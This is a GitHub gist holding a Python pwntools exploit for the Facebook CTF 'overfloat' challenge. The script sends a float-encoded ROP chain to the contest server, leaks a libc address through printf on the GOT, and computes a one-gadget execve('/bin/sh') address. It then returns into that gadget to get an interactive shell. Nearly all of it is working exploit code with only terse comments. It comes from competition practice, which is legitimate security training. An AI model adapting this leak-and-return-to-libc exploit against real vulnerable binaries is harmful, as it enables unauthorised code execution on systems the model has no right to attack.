Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
import binascii
import subprocess
# 9DD00 is strncmp in libc
# 4F440 is system in libc
# 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rcx == NULL
# 0x4f322 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a38c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
SYSTEM_OFFSET = 0x21ab0 - 0x4f2c5
def phex(x):
x = subprocess.Popen(["./goback","%x" % x],stdout=subprocess.PIPE)
proc = x.stdout.readline()
x.wait()
return proc.rstrip()
p = pwn.remote("challenges.fbctf.com",1341)
# p = pwn.process("./overfloat")
# print "ATTACH NOW! (pid %d)" % p.pid
# raw_input()
p.recv()
def sendline(l):
global p
print p.recv(timeout=0.1)
p.send(l + "\n")
print "stage 1 rop go"
p.recv(timeout=0.5)
for i in range(0,11):
if i == 7:
sendline(phex(0x400a83)) # pop edi
sendline(phex(0x0))
elif i == 8:
# sendline(phex(0x400abb))
sendline(phex(0x602050)) # (edi = .got)
# sendline(phex(0x6020a8)) # (edi = .got)
sendline(phex(0x0))
elif i == 9: # return to puts
# sendline(phex(0x4006c0)) # PUTS
sendline(phex(0x400690)) # PRINTF
sendline(phex(0x0))
elif i == 10: # reset
sendline(phex(0x400749)) # actual reset for remote target. holy balls...
sendline(phex(0x0))
else:
sendline(phex(0x72ff1100 + i))
sendline(phex(0x44114400 + i))
print "stage 1 rop catch"
data = p.recv()
sendline("done")
data = p.recv(timeout=0.5)
# print data[0:8]
data = p.recv(timeout=0.5)
print "********************"
l = len("BON VOYAGE!")
offset = data[l+1:l+7] + "\x00\x00"
print len(offset)
import struct
off = struct.unpack("L",offset)[0] - SYSTEM_OFFSET
print hex(off)
# p.interactive()
ph_part1 = (off & 0xFFFFFFFF00000000) / 0x100000000
ph_part2 = off & 0xFFFFFFFF
print "HEXP1 = %x" % ph_part1
print "HEXP2 = %x" % ph_part2
# spray and pray...
for i in range(0,11):
sendline(phex(ph_part2))
sendline(phex(ph_part1))
sendline("done")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.